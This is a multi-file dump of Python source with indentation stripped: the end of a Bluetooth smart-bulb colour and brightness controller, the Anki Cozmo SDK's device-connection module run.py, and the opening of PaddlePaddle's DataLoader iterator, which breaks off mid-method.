self.__is_color = False
self.__current_brightness = data[15] # range 0-16
self.__current_color = (0xff, 0xff, 0xff)
elif data[14] == 0x02:
data = self.__send_hex_string(0x81, '0000000000000000000d07020300000e')
logging.debug('Read color status: %s' % bluetooth.binascii.hexlify(data))
self.__is_color = True
self.__set_normalized_color_brightness(data[16], data[17], data[18])
logging.info('Mode is %s' % ('color' if self.__is_color else 'yellow/white'))
logging.info('Brightness is %d' % self.__current_brightness)
logging.info('Color is %02x%02x%02x' % self.__current_color)
# bulb function 0x81, subfunction 0x01: write power and color status
@__check_connection
def set_power(self, is_power):
logging.debug('Set power %s' % ('on' if is_power else 'off'))
if self.__is_power is None or self.__is_power != is_power:
self.__send_hex_string(0x81, '0000000000000000000d07%s0301%s0e' % \
('02' if self.__is_color else '01', \
'01' if is_power else '02'))
self.__is_power = is_power
# bulb function 0x81, subfunction 0x01: write power and color status
@__check_connection
def set_color_mode(self, is_color):
logging.debug('Switch to %s' % ('color mode' if is_color else 'white/yellow mode'))
if self.__is_color is None or self.__is_color != is_color:
self.__send_hex_string(0x81, '0000000000000000000d07%s0301%s0e' % \
('02' if is_color else '01', \
'01' if self.__is_power else '02'))
self.__is_color = is_color
# bulb function 0x81, subfunction 0x02: set brightness
@__check_connection
def set_brightness(self, brightness):
logging.debug('Set brightness to %s' % brightness)
if not self.__is_color:
self.__send_hex_string(0x81, '0000000000000000000d07010302%02x0e' % brightness)
self.__current_brightness = brightness
else:
(r, g, b) = self.__current_color
r_ = int(round(r * brightness / 16, 0))
g_ = int(round(g * brightness / 16, 0))
b_ = int(round(b * brightness / 16, 0))
self.set_color_rgb(r_, g_, b_)
# bulb function 0x81, subfunction 0x03: set color
@__check_connection
def set_color_rgb(self, r, g, b):
logging.debug('Set color to %02x%02x%02x' % (r, g, b))
self.__send_hex_string(0x81, '0000000000000000000d0a020303%02x%02x%02x000e' % (r, g, b))
self.__is_color = True
self.__set_normalized_color_brightness(r, g, b)
# see https://en.wikipedia.org/wiki/HSL_and_HSV
def __hsv_to_rgb(self, hue, sat, val):
c = val * sat
x = c * (1 - abs(((hue/60.0) % 2) - 1))
m = val - c
(r_, g_, b_) = (0, 0, 0)
if 0 <= hue < 60:
(r_, g_, b_) = (c, x, 0)
elif 60 <= hue < 120:
(r_, g_, b_) = (x, c, 0)
elif 120 <= hue < 180:
(r_, g_, b_) = (0, c, x)
elif 180 <= hue < 240:
(r_, g_, b_) = (0, x, c)
elif 240 <= hue < 300:
(r_, g_, b_) = (x, 0, c)
elif 300 <= hue < 360:
(r_, g_, b_) = (c, 0, x)
(r, g, b) = \
(int(round((r_+m)*255, 0)), \
int(round((g_+m)*255, 0)), \
int(round((b_+m)*255, 0)))
return (r, g, b)
# 0 <= hue < 360, sat = 100, 1 <= brightness <= 16
@__check_connection
def set_color_hsv(self, hue, brightness):
sat = 1.0 # saturation values below 0.7 are pointless, will always result in white
val = brightness/16
(r, g, b) = self.__hsv_to_rgb(hue, 1.0, val)
self.set_color_rgb(r, g, b)
# see https://tannerhelland.com/2012/09/18/convert-temperature-rgb-algorithm-code.html
# teperature range is [1000, 40000], but the intersting red to white range is [1500, 6600]
def __temp_to_rgb(self, temperature, brightness):
t = min(40000, max(1000, temperature)) / 100 # constrain to [1000, 40000] and divide by 100
# red
r = 255
if t > 66:
r = t - 60
r = 329.698727446 * pow(r, -0.1332047592)
r = min(255, max(0, r)) # constrain to [0, 255]
# green
g = 255
if t <= 66:
g = t
g = 99.4708025861 * math.log(g) - 161.1195681661
g = min(255, max(0, g)) # constrain to [0, 255]
else:
g = t - 60
g = 288.1221695283 * pow(g, -0.0755148492)
g = min(255, max(0, g)) # constrain to [0, 255]
# blue
b = 255
if t < 66:
b = t - 10
b = 138.5177312231 * math.log(b) - 305.0447927307
b = min(255, max(0, b)) # constrain to [0, 255]
(r_, g_, b_) = \
(int(round(r * brightness / 16, 0)),
int(round(g * brightness / 16, 0)),
int(round(b * brightness / 16, 0)))
return (r_, g_, b_)
# 1000 <= temp_kelvin <= 40000, 1 <= brightness <= 16
@__check_connection
def set_white_temperature(self, temp_kelvin, brightness):
(r, g, b) = self.__temp_to_rgb(temp_kelvin, brightness)
self.set_color_rgb(r, g, b)
# TODO investigate modes 1, 2 and 3
# 0 -> off
# 1 -> existing color ?? rhythm
# 2 -> existing color ?? rhythm
# 3 -> existing color ?? rhythm
# 4 -> rainbow
# 5 -> pulse
# 6 -> candle
# bulb function 0x81, subfunction 0x04: set party mode
@__check_connection
def set_party_mode(self, mode):
logging.debug('Set party mode %s' % mode)
self.__send_hex_string(0x81, '0000000000000000000d07020304%02x0e' % mode)
self.__is_color = True
|
run.py
|
# Copyright (c) 2016-2017 Anki, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License in the file LICENSE.txt or at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''The run module contains helper classes and functions for opening a connection to the engine.
To get started, the :func:`run_program` function can be used for most cases,
it handles connecting to a device and then running the function you provide with
the SDK-provided Robot object passed in.
The :func:`connect` function can be used to open a connection
and run your own code connected to a :class:`cozmo.conn.CozmoConnection`
instance. It takes care of setting up an event loop, finding the Android or
iOS device running the Cozmo app and making sure the connection is ok.
You can also use the :func:`connect_with_tkviewer` or :func:`connect_with_3dviewer`
functions which works in a similar way to :func:`connect`, but will also display
either a a window on the screen showing a view from Cozmo's camera (using Tk), or
a 3d viewer (with optional 2nd window showing Cozmo's camera) (using OpenGL), if
supported on your system.
Finally, more advanced progarms can integrate the SDK with an existing event
loop by using the :func:`connect_with_loop` function.
All of these functions make use of a :class:`DeviceConnector` subclass to
deal with actually connecting to an Android or iOS device. There shouldn't
normally be a need to modify them or write your own.
'''
# __all__ should order by constants, event classes, other classes, functions.
__all__ = ['DeviceConnector', 'IOSConnector', 'AndroidConnector', 'TCPConnector',
'connect', 'connect_with_3dviewer', 'connect_with_tkviewer', 'connect_on_loop',
'run_program', 'setup_basic_logging']
import threading
import asyncio
import concurrent.futures
import functools
import inspect
import logging
import os
import os.path
import queue
import shutil
import subprocess
import sys
import types
import warnings
from . import logger, logger_protocol
from . import base
from . import clad_protocol
from . import conn
from . import event
from . import exceptions
from . import usbmux
#: The TCP port number we expect the Cozmo app to be listening on.
COZMO_PORT = 5106
if sys.platform in ('win32', 'cygwin'):
DEFAULT_ADB_CMD = 'adb.exe'
else:
DEFAULT_ADB_CMD = 'adb'
def _observe_connection_lost(proto, cb):
meth = proto.connection_lost
@functools.wraps(meth)
def connection_lost(self, exc):
meth(exc)
cb()
proto.connection_lost = types.MethodType(connection_lost, proto)
class DeviceConnector:
'''Base class for objects that setup the physical connection to a device.'''
def __init__(self, cozmo_port=COZMO_PORT, enable_env_vars=True):
self.cozmo_port = cozmo_port
if enable_env_vars:
self.parse_env_vars()
async def connect(self, loop, protocol_factory, conn_check):
'''Connect attempts to open a connection transport to the Cozmo app on a device.
On opening a transport it will create a protocol from the supplied
factory and connect it to the transport, returning a (transport, protocol)
tuple. See :meth:`asyncio.BaseEventLoop.create_connection`
'''
raise NotImplementedError
def parse_env_vars(self):
try:
self.cozmo_port = int(os.environ['COZMO_PORT'])
except (KeyError, ValueError):
pass
class IOSConnector(DeviceConnector):
'''Connects to an attached iOS device over USB.
Opens a connection to the first iOS device that's found to be running
the Cozmo app in SDK mode.
iTunes (or another service providing usbmuxd) must be installed in order
for this connector to be able to open a connection to a device.
An instance of this class can be passed to the ``connect_`` prefixed
functions in this module.
Args:
serial (string): Serial number of the device to connect to.
If None, then connect to the first available iOS device running
the Cozmo app in SDK mode.
'''
def __init__(self, serial=None, **kw):
super().__init__(**kw)
self.usbmux = None
self._connected = set()
self.serial = serial
async def connect(self, loop, protocol_factory, conn_check):
if not self.usbmux:
self.usbmux = await usbmux.connect_to_usbmux(loop=loop)
try:
if self.serial is None:
device_info, transport, proto = await self.usbmux.connect_to_first_device(
protocol_factory, self.cozmo_port, exclude=self._connected)
else:
device_id = await self.usbmux.wait_for_serial(self.serial)
device_info, transport, proto = await self.usbmux.connect_to_device(
protocol_factory, device_id, self.cozmo_port)
except asyncio.TimeoutError as exc:
raise exceptions.ConnectionError("No connected iOS devices running Cozmo in SDK mode") from exc
device_id = device_info.get('DeviceID')
proto.device_info={
'device_type': 'ios',
'device_id': device_id,
'serial': device_info.get('SerialNumber')
}
if conn_check is not None:
await conn_check(proto)
self._connected.add(device_id)
logger.info('Connected to iOS device_id=%s serial=%s', device_id,
device_info.get('SerialNumber'))
_observe_connection_lost(proto, functools.partial(self._disconnect, device_id))
return transport, proto
def _disconnect(self, device_id):
logger.info('iOS device_id=%s disconnected.', device_id)
self._connected.discard(device_id)
class AndroidConnector(DeviceConnector):
'''Connects to an attached Android device over USB.
This requires the Android Studio command line tools to be installed,
specifically `adb`.
By default the connector will attempt to locate `adb` (or `adb.exe`
on Windows) in common locations, but it may also be supplied by setting
the ``ANDROID_ADB_PATH`` environment variable, or by passing it
to the constructor.
An instance of this class can be passed to the ``connect_`` prefixed
functions in this module.
Args:
serial (string): Serial number of the device to connect to.
If None, then connect to the first available Android device running
the Cozmo app in SDK mode.
'''
def __init__(self, adb_cmd=None, serial=None, **kw):
self._adb_cmd = None
super().__init__(**kw)
self.serial = serial
self.portspec = 'tcp:' + str(self.cozmo_port)
self._connected = set()
if adb_cmd:
self._adb_cmd = adb_cmd
else:
self._adb_cmd = shutil.which(DEFAULT_ADB_CMD)
def parse_env_vars(self):
super().parse_env_vars()
self._adb_cmd = os.environ.get('ANDROID_ADB_PATH')
@property
def adb_cmd(self):
if self._adb_cmd is not None:
return self._adb_cmd
if sys.platform != 'win32':
return DEFAULT_ADB_CMD
# C:\Users\IEUser\AppData\Local\Android\android-sdk
# C:\Program Files (x86)\Android\android-sdk
try_paths = []
for path in [os.environ[key] for key in ('LOCALAPPDATA', 'ProgramFiles', 'ProgramFiles(x86)') if key in os.environ]:
try_paths.append(os.path.join(path, 'Android', 'android-sdk'))
for path in try_paths:
adb_path = os.path.join(path, 'platform-tools', 'adb.exe')
if os.path.exists(adb_path):
self._adb_cmd = adb_path
logger.debug('Found adb.exe at %s', adb_path)
return adb_path
raise ValueError('Could not find Android development tools')
def _exec(self, *args):
try:
result = subprocess.run([self.adb_cmd] + list(args),
stdout=subprocess.PIPE, stderr=subprocess.PIPE, timeout=5)
except Exception as e:
raise ValueError('Failed to execute adb command %s: %s' % (self.adb_cmd, e))
if result.returncode != 0:
raise ValueError('Failed to execute adb command %s: %s' % (result.args, result.stderr))
return result.stdout.split(b'\n')
def _devices(self):
for line in self._exec('devices'):
line = line.split()
if len(line) != 2 or line[1] != b'device':
continue
yield line[0].decode('ascii') # device serial #
def _add_forward(self, serial):
self._exec('-s', serial, 'forward', self.portspec, self.portspec)
def _remove_forward(self, serial):
self._exec('-s', serial, 'forward', '--remove', self.portspec)
async def connect(self, loop, protocol_factory, conn_check):
version_mismatch = None
for serial in self._devices():
if serial in self._connected:
continue
if self.serial is not None and serial.lower() != self.serial.lower():
continue
logger.debug('Checking connection to Android device: %s', serial)
try:
self._remove_forward(serial)
except:
pass
self._add_forward(serial)
try:
transport, proto = await loop.create_connection(
protocol_factory, '127.0.0.1', self.cozmo_port)
proto.device_info={
'device_type': 'android',
'serial': serial,
}
if conn_check:
# Check that we have a good connection before returning
try:
await conn_check(proto)
except Exception as e:
logger.debug('Failed connection check: %s', e)
raise
logger.info('Connected to Android device serial=%s', serial)
self._connected.add(serial)
_observe_connection_lost(proto, functools.partial(self._disconnect, serial))
return transport, proto
except exceptions.SDKVersionMismatch as e:
version_mismatch = e
except:
pass
self._remove_forward(serial)
if version_mismatch is not None:
raise version_mismatch
raise exceptions.ConnectionError("No connected Android devices running Cozmo in SDK mode")
def _disconnect(self, serial):
logger.info('Android serial=%s disconnected.', serial)
self._connected.discard(serial)
class TCPConnector(DeviceConnector):
'''Connects to the Cozmo app directly via TCP.
Generally only used for testing and debugging.
Requires that a SDK_TCP_PORT environment variable be set to the port
number to connect to.
'''
def __init__(self, tcp_port=None, ip_addr='127.0.0.1', **kw):
super().__init__(**kw)
self.ip_addr = ip_addr
if tcp_port is not None:
# override SDK_TCP_PORT environment variable
self.tcp_port = tcp_port
def parse_env_vars(self):
super().parse_env_vars()
self.tcp_port = None
try:
self.tcp_port = int(os.environ['SDK_TCP_PORT'])
except (KeyError, ValueError):
pass
@property
def enabled(self):
return self.tcp_port is not None
async def connect(self, loop, protocol_factory, conn_check):
transport, proto = await loop.create_connection(protocol_factory, self.ip_addr, self.tcp_port)
proto.device_info={
'device_type': 'tcp',
'host': '%s:%s' % (self.ip_addr, self.tcp_port),
}
if conn_check:
try:
await conn_check(proto)
except Exception as e:
logger.debug('Failed connection check: %s', e)
raise
logger.info("Connected to device on TCP port %d" % self.tcp_port)
return transport, proto
class FirstAvailableConnector(DeviceConnector):
'''Connects to the first Android or iOS device running the Cozmo app in SDK mode.
This class creates an :class:`AndroidConnector` or :class:`IOSConnector`
instance and returns the first successful connection.
This is the default connector used by ``connect_`` functions.
'''
def __init__(self):
super().__init__(self, enable_env_vars=False)
self.tcp = TCPConnector()
self.ios = IOSConnector()
self.android = AndroidConnector()
async def _do_connect(self, connector,loop, protocol_factory, conn_check):
connect = connector.connect(loop, protocol_factory, conn_check)
result = await asyncio.gather(connect, loop=loop, return_exceptions=True)
return result[0]
async def connect(self, loop, protocol_factory, conn_check):
conn_args = (loop, protocol_factory, conn_check)
tcp_result = None
if self.tcp.enabled:
tcp_result = await self._do_connect(self.tcp, *conn_args)
if not isinstance(tcp_result, BaseException):
return tcp_result
logger.warning('No TCP connection found running Cozmo: %s', tcp_result)
android_result = await self._do_connect(self.android, *conn_args)
if not isinstance(android_result, BaseException):
return android_result
ios_result = await self._do_connect(self.ios, *conn_args)
if not isinstance(ios_result, BaseException):
return ios_result
logger.warning('No iOS device found running Cozmo: %s', ios_result)
logger.warning('No Android device found running Cozmo: %s', android_result)
if isinstance(tcp_result, exceptions.SDKVersionMismatch):
raise tcp_result
if isinstance(ios_result, exceptions.SDKVersionMismatch):
raise ios_result
if isinstance(android_result, exceptions.SDKVersionMismatch):
raise android_result
raise exceptions.NoDevicesFound('No devices connected running Cozmo in SDK mode')
# Create an instance of a connector to use by default
# The instance will maintain state about which devices are currently connected.
_DEFAULT_CONNECTOR = FirstAvailableConnector()
def _sync_exception_handler(abort_future, loop, context):
loop.default_exception_handler(context)
exception = context.get('exception')
if exception is not None:
abort_future.set_exception(context['exception'])
else:
abort_future.set_exception(RuntimeError(context['message']))
class _LoopThread:
'''Takes care of managing an event loop running in a dedicated thread.
Args:
loop (:class:`asyncio.BaseEventLoop`): The loop to run
f (callable): Optional code to execute on the loop's thread
conn_factory (callable): Override the factory function to generate a
:class:`cozmo.conn.CozmoConnection` (or subclass) instance.
connector (:class:`DeviceConnector`): Optional instance of a DeviceConnector
subclass that handles opening the USB connection to a device.
By default, it will connect to the first Android or iOS device that
has the Cozmo app running in SDK mode.
abort_future (:class:`concurrent.futures.Future): Optional future to
raise an exception on in the event of an exception occurring within
the thread.
'''
def __init__(self, loop, f=None, conn_factory=conn.CozmoConnection, connector=None, abort_future=None):
self.loop = loop
self.f = f
if not abort_future:
abort_future = concurrent.futures.Future()
self.abort_future = abort_future
self.conn_factory = conn_factory
self.connector = connector
self.thread = None
self._running = False
def start(self):
'''Start a thread and open a connection to a device.
Returns:
:class:`cozmo.conn.CozmoConnection` instance
'''
q = queue.Queue()
abort_future = concurrent.futures.Future()
def run_loop():
asyncio.set_event_loop(self.loop)
try:
coz_conn = connect_on_loop(self.loop, self.conn_factory, self.connector)
q.put(coz_conn)
except Exception as e:
self.abort_future.set_exception(e)
q.put(e)
return
if self.f:
asyncio.ensure_future(self.f(coz_conn))
self.loop.run_forever()
self.thread = threading.Thread(target=run_loop)
self.thread.start()
coz_conn = q.get(10)
if coz_conn is None:
raise TimeoutError("Timed out waiting for connection to device")
if isinstance(coz_conn, Exception):
raise coz_conn
self.coz_conn = coz_conn
self._running = True
return coz_conn
def stop(self):
'''Cleaning shutdown the running loop and thread.'''
if self._running:
async def _stop():
await self.coz_conn.shutdown()
self.loop.call_soon(lambda: self.loop.stop())
asyncio.run_coroutine_threadsafe(_stop(), self.loop).result()
self.thread.join()
self._running = False
def abort(self, exc):
'''Abort the running loop and thread.'''
if self._running:
async def _abort(exc):
self.coz_conn.abort(exc)
asyncio.run_coroutine_threadsafe(_abort(exc), self.loop).result()
self.stop()
def _connect_async(f, conn_factory=conn.CozmoConnection, connector=None):
# use the default loop, if one is available for the current thread,
# if not create a new loop and make it the default.
#
# the expectation is that if the user wants explicit control over which
# loop the code is executed on, they'll just use connect_on_loop directly.
loop = None
try:
loop = asyncio.get_event_loop()
except:
pass
if loop is None:
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
coz_conn = connect_on_loop(loop, conn_factory, connector)
try:
loop.run_until_complete(f(coz_conn))
except KeyboardInterrupt:
logger.info('Exit requested by user')
finally:
loop.run_until_complete(coz_conn.shutdown())
loop.stop()
loop.run_forever()
_sync_loop = asyncio.new_event_loop()
def _connect_sync(f, conn_factory=conn.CozmoConnection, connector=None):
abort_future = concurrent.futures.Future()
conn_factory = functools.partial(conn_factory, _sync_abort_future=abort_future)
lt = _LoopThread(_sync_loop, conn_factory=conn_factory, connector=connector, abort_future=abort_future)
_sync_loop.set_exception_handler(functools.partial(_sync_exception_handler, abort_future))
coz_conn = lt.start()
try:
f(base._SyncProxy(coz_conn))
finally:
lt.stop()
def connect_on_loop(loop, conn_factory=conn.CozmoConnection, connector=None):
'''Uses the supplied event loop to connect to a device.
Will run the event loop in the current thread until the
connection succeeds or fails.
If you do not want/need to manage your own loop, then use the
:func:`connect` function to handle setup/teardown and execute
a user-supplied function.
Args:
loop (:class:`asyncio.BaseEventLoop`): The event loop to use to
connect to Cozmo.
conn_factory (callable): Override the factory function to generate a
:class:`cozmo.conn.CozmoConnection` (or subclass) instance.
connector (:class:`DeviceConnector`): Optional instance of a DeviceConnector
subclass that handles opening the USB connection to a device.
By default, it will connect to the first Android or iOS device that
has the Cozmo app running in SDK mode.
Returns:
A :class:`cozmo.conn.CozmoConnection` instance.
'''
if connector is None:
connector = _DEFAULT_CONNECTOR
factory = functools.partial(conn_factory, loop=loop)
async def conn_check(coz_conn):
await coz_conn.wait_for(conn.EvtConnected, timeout=5)
async def connect():
return await connector.connect(loop, factory, conn_check)
transport, coz_conn = loop.run_until_complete(connect())
return coz_conn
def connect(f, conn_factory=conn.CozmoConnection, connector=None):
'''Connects to the Cozmo Engine on the mobile device and supplies the connection to a function.
Accepts a function, f, that is given a :class:`cozmo.conn.CozmoConnection` object as
a parameter.
The supplied function may be either an asynchronous coroutine function
(normally defined using ``async def``) or a regular synchronous function.
If an asynchronous function is supplied it will be run on the same thread
as the Cozmo event loop and must use the ``await`` keyword to yield control
back to the loop.
If a synchronous function is supplied then it will run on the main thread
and Cozmo's event loop will run on a separate thread. Calls to
asynchronous methods returned from CozmoConnection will automatically
be translated to synchronous ones.
The connect function will return once the supplied function has completed,
as which time it will terminate the connection to the robot.
Args:
f (callable): The function to execute
conn_factory (callable): Override the factory function to generate a
:class:`cozmo.conn.CozmoConnection` (or subclass) instance.
connector (:class:`DeviceConnector`): Optional instance of a DeviceConnector
subclass that handles opening the USB connection to a device.
By default it will connect to the first Android or iOS device that
has the Cozmo app running in SDK mode.
'''
if asyncio.iscoroutinefunction(f):
return _connect_async(f, conn_factory, connector)
return _connect_sync(f, conn_factory, connector)
def _connect_viewer(f, conn_factory, connector, viewer):
# Run the viewer in the main thread, with the SDK running on a new background thread.
loop = asyncio.new_event_loop()
abort_future = concurrent.futures.Future()
async def view_connector(coz_conn):
try:
await viewer.connect(coz_conn)
if inspect.iscoroutinefunction(f):
await f(coz_conn)
else:
await coz_conn._loop.run_in_executor(None, f, base._SyncProxy(coz_conn))
finally:
viewer.disconnect()
try:
if not inspect.iscoroutinefunction(f):
conn_factory = functools.partial(conn_factory, _sync_abort_future=abort_future)
lt = _LoopThread(loop, f=view_connector, conn_factory=conn_factory, connector=connector)
lt.start()
viewer.mainloop()
except BaseException as e:
abort_future.set_exception(exceptions.SDKShutdown(repr(e)))
raise
finally:
lt.stop()
def connect_with_3dviewer(f, conn_factory=conn.CozmoConnection, connector=None,
enable_camera_view=False):
'''Setup a connection to a device and run a user function while displaying Cozmo's 3d world.
This displays an OpenGL window on the screen with a 3D view of Cozmo's
understanding of the world. Optionally, if `use_viewer` is True, a 2nd OpenGL
window will also display showing a view of Cozmo's camera. It will return an
error if the current system does not support PyOpenGL.
The function may be either synchronous or asynchronous (defined
used ``async def``).
The function must accept a :class:`cozmo.CozmoConnection` object as
its only argument.
This call will block until the supplied function completes.
Args:
f (callable): The function to execute
conn_factory (callable): Override the factory function to generate a
:class:`cozmo.conn.CozmoConnection` (or subclass) instance.
connector (:class:`DeviceConnector`): Optional instance of a DeviceConnector
subclass that handles opening the USB connection to a device.
By default it will connect to the first Android or iOS device that
has the Cozmo app running in SDK mode.
enable_camera_view (bool): Specifies whether to also open a 2D camera
view in a second OpenGL window.
'''
try:
from . import opengl
except ImportError as exc:
opengl = exc
if isinstance(opengl, Exception):
if isinstance(opengl, exceptions.InvalidOpenGLGlutImplementation):
raise NotImplementedError('GLUT (OpenGL Utility Toolkit) is not available:\n%s'
% opengl)
else:
raise NotImplementedError('opengl is not available; '
'make sure the PyOpenGL, PyOpenGL-accelerate and Pillow packages are installed:\n'
'Do `pip3 install --user cozmo[3dviewer]` to install. Error: %s' % opengl)
viewer = opengl.OpenGLViewer(enable_camera_view=enable_camera_view)
_connect_viewer(f, conn_factory, connector, viewer)
def connect_with_tkviewer(f, conn_factory=conn.CozmoConnection, connector=None, force_on_top=False):
'''Setup a connection to a device and run a user function while displaying Cozmo's camera.
This displays a Tk window on the screen showing a view of Cozmo's camera.
It will return an error if the current system does not support Tk.
The function may be either synchronous or asynchronous (defined
used ``async def``).
The function must accept a :class:`cozmo.CozmoConnection` object as
its only argument.
This call will block until the supplied function completes.
Args:
f (callable): The function to execute
conn_factory (callable): Override the factory function to generate a
:class:`cozmo.conn.CozmoConnection` (or subclass) instance.
connector (:class:`DeviceConnector`): Optional instance of a DeviceConnector
subclass that handles opening the USB connection to a device.
By default it will connect to the first Android or iOS device that
has the Cozmo app running in SDK mode.
force_on_top (bool): Specifies whether the window should be forced on top of all others
'''
try:
from . import tkview
except ImportError as exc:
tkview = exc
if isinstance(tkview, Exception):
raise NotImplementedError('tkviewer not available on this platform; '
'make sure Tkinter, NumPy and Pillow packages are installed (%s)' % tkview)
viewer = tkview.TkImageViewer(force_on_top=force_on_top)
_connect_viewer(f, conn_factory, connector, viewer)
def setup_basic_logging(general_log_level=None, protocol_log_level=None,
protocol_log_messages=clad_protocol.LOG_ALL, target=sys.stderr,
deprecated_filter="default"):
'''Helper to perform basic setup of the Python logging machinery.
The SDK defines two loggers:
* :data:`logger` ("cozmo.general") - For general purpose information
about events within the SDK; and
* :data:`logger_protocol` ("cozmo.protocol") - For low level
communication messages between the device and the SDK.
Generally only :data:`logger` is interesting.
Args:
general_log_level (str): 'DEBUG', 'INFO', 'WARN', 'ERROR' or an equivalent
constant from the :mod:`logging` module. If None then a
value will be read from the COZMO_LOG_LEVEL environment variable.
protocol_log_level (str): as general_log_level. If None then a
value will be read from the COZMO_PROTOCOL_LOG_LEVEL environment
variable.
protocol_log_messages (list): The low level messages that should be
logged to the protocol log. Defaults to all. Will read from
the COMZO_PROTOCOL_LOG_MESSAGES if available which should be
a comma separated list of message names (case sensitive).
target (object): The stream to send the log data to; defaults to stderr
deprecated_filter (str): The filter for any DeprecationWarning messages.
This is defaulted to "default" which shows the warning once per
location. You can hide all deprecated warnings by passing in "ignore",
see https://docs.python.org/3/library/warnings.html#warning-filter
for more information.
'''
if deprecated_filter is not None:
warnings.filterwarnings(deprecated_filter, category=DeprecationWarning)
if general_log_level is None:
general_log_level = os.environ.get('COZMO_LOG_LEVEL', logging.INFO)
if protocol_log_level is None:
protocol_log_level = os.environ.get('COZMO_PROTOCOL_LOG_LEVEL', logging.INFO)
if protocol_log_level:
if 'COMZO_PROTOCOL_LOG_MESSAGES' in os.environ:
lm = os.environ['COMZO_PROTOCOL_LOG_MESSAGES']
if lm.lower() == 'all':
clad_protocol.CLADProtocol._clad_log_which = clad_protocol.LOG_ALL
else:
clad_protocol.CLADProtocol._clad_log_which = set(lm.split(','))
else:
clad_protocol.CLADProtocol._clad_log_which = protocol_log_messages
h = logging.StreamHandler(stream=target)
f = logging.Formatter('%(asctime)s %(name)-12s %(levelname)-8s %(message)s')
h.setFormatter(f)
logger.addHandler(h)
logger. setLevel(general_log_level)
if protocol_log_level is not None:
logger_protocol.addHandler(h)
logger_protocol.setLevel(protocol_log_level)
def run_program(f, use_viewer=False, conn_factory=conn.CozmoConnection,
connector=None, force_viewer_on_top=False,
deprecated_filter="default", use_3d_viewer=False):
'''Connect to Cozmo and run the provided program/function f.
Args:
f (callable): The function to execute, accepts a connected
:class:`cozmo.robot.Robot` as the parameter.
use_viewer (bool): Specifies whether to display a view of Cozmo's camera
in a window.
conn_factory (callable): Override the factory function to generate a
:class:`cozmo.conn.CozmoConnection` (or subclass) instance.
connector (:class:`DeviceConnector`): Optional instance of a DeviceConnector
subclass that handles opening the USB connection to a device.
By default it will connect to the first Android or iOS device that
has the Cozmo app running in SDK mode.
force_viewer_on_top (bool): Specifies whether the window should be
forced on top of all others (only relevant if use_viewer is True).
Note that this is ignored if use_3d_viewer is True (as it's not
currently supported on that windowing system).
deprecated_filter (str): The filter for any DeprecationWarning messages.
This is defaulted to "default" which shows the warning once per
location. You can hide all deprecated warnings by passing in "ignore",
see https://docs.python.org/3/library/warnings.html#warning-filter
for more information.
use_3d_viewer (bool): Specifies whether to display a 3D view of Cozmo's
understanding of the world in a window. Note that if both this and
`use_viewer` are set then the 2D camera view will render in an OpenGL
window instead of a TkView window.
'''
setup_basic_logging(deprecated_filter=deprecated_filter)
# Wrap f (a function that takes in an already created robot)
# with a function that accepts a cozmo.conn.CozmoConnection
if asyncio.iscoroutinefunction(f):
@functools.wraps(f)
async def wrapper(sdk_conn):
try:
robot = await sdk_conn.wait_for_robot()
await f(robot)
except exceptions.SDKShutdown:
pass
except KeyboardInterrupt:
logger.info('Exit requested by user')
else:
@functools.wraps(f)
def wrapper(sdk_conn):
try:
robot = sdk_conn.wait_for_robot()
f(robot)
except exceptions.SDKShutdown:
pass
except KeyboardInterrupt:
logger.info('Exit requested by user')
try:
if use_3d_viewer:
connect_with_3dviewer(wrapper, conn_factory=conn_factory, connector=connector,
enable_camera_view=use_viewer)
elif use_viewer:
connect_with_tkviewer(wrapper, conn_factory=conn_factory, connector=connector,
force_on_top=force_viewer_on_top)
else:
connect(wrapper, conn_factory=conn_factory, connector=connector)
except KeyboardInterrupt:
logger.info('Exit requested by user')
except exceptions.ConnectionError as e:
sys.exit("A connection error occurred: %s" % e)
|
dataloader_iter.py
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import six
import sys
import time
import signal
import numbers
import logging
import itertools
import threading
import numpy as np
import multiprocessing
from collections import namedtuple
from paddle.fluid.framework import _set_expected_place, _current_expected_place
# NOTE: queue has a different name in python2 and python3
import queue
import paddle
from .. import core, layers
from ..framework import in_dygraph_mode
from ..multiprocess_utils import _set_SIGCHLD_handler, MP_STATUS_CHECK_INTERVAL, CleanupFuncRegistrar
from .fetcher import _IterableDatasetFetcher, _MapDatasetFetcher
from .batch_sampler import _InfiniteIterableSampler
from .collate import default_collate_fn, default_convert_fn
from .worker import ParentWatchDog, get_worker_info, _worker_loop, \
_DatasetKind, _IterableDatasetStopIteration, _WorkerException, \
_ResumeIteration
from .flat import _flatten_batch, _restore_batch
__all__ = ['get_worker_info']
class _DataLoaderIterBase(object):
"""
Iterator implement of DataLoader, will load and feed mini-batch
data by setting in given dataloader.
Args:
loader(instance of DataLoader): instance of `fluid.io.DataLoader`
"""
def __init__(self, loader):
self._dataset = loader.dataset
self._feed_list = loader.feed_list or []
self._places = loader.places
self._return_list = loader.return_list
self._batch_sampler = loader.batch_sampler
self._drop_last = loader.drop_last
self._auto_collate_batch = loader.auto_collate_batch
self._num_workers = loader.num_workers
self._use_buffer_reader = loader.use_buffer_reader
self._use_shared_memory = loader.use_shared_memory
self._timeout = loader.timeout if loader.timeout > 0 else MP_STATUS_CHECK_INTERVAL
self._worker_init_fn = loader.worker_init_fn
self._dataset_kind = loader.dataset_kind
self._pin_memory = loader.pin_memory
self._sampler_iter = iter(self._index_sampler)
if self._auto_collate_batch:
self._collate_fn = loader.collate_fn or default_collate_fn
else:
self._collate_fn = loader.collate_fn or default_convert_fn
# LoDTensorBlockingQueue instance for create_py_reader and a thread
# to put mini-batch data to self._blocking_queue, mini-batch data
# will be get from:
# 1. multi-process mode: get data from workers' result queue
# 2. single-process mode: read mini-batch data in main process
self._blocking_queue = None
self._thread = None
self._thread_done_event = threading.Event()
@property
def _index_sampler(self):
if self._auto_collate_batch:
return self._batch_sampler
else:
